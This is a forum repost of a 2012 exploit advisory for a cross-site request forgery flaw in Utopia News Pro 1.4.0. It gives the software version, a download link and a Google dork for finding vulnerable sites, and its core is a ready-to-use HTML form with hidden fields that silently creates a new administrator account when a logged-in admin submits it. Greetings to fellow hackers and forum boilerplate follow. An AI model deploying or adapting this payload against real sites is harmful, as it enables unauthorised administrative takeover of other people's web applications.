Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability

The_Arhitect · April 8, 2012

# Exploit Title: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability
# Date: 7/4/2012
# Author: Dr.NaNo
# Software Link: http://www.utopiasoftware.net/newspro/dl.php?filename=newspro140b.zip&mirror=1
# Version: 1.4.0
# Tested on: Linux-Red-Hat
# Google Dork: Powered By Utopia News Pro 1.4.0
#
########################################################
#                      ~ Exploit ~                     #
########################################################

<html>
<body>
<form action="http://localhost/{PATh}/upload/users.php" method="post" />
<input type="hidden" name="username" value="NANO" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="password" value="102030" />
<input type="hidden" name="password2" value="102030" />
<input type="hidden" name="email" value="security@security.com" />
<input type="submit" name="submitnew" accesskey="s" value="ThankS !" />
</form>
</body>
</html>

#### ~ Greetz ~ #########################################################
#                                                                       #
# Dr.WEP , JIKO , ahwak2000 , RENO , ABU NWAF , Dr.HAiL , snc0pe , 020  #
#                                                                       #
# JaBrOt HaCkEr , alkaseer20 , SadHaCkEr , Cyber Code , aircrack -ng    #
#                                                                       #
############################################### ~ All FriendS ~ #########

Sursa: Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability

Sign In

Utopia News Pro 1.4.0 <= CSRF Add Admin Vulnerability

Recommended Posts

The_Arhitect

Join the conversation

Browse

Activity

Pages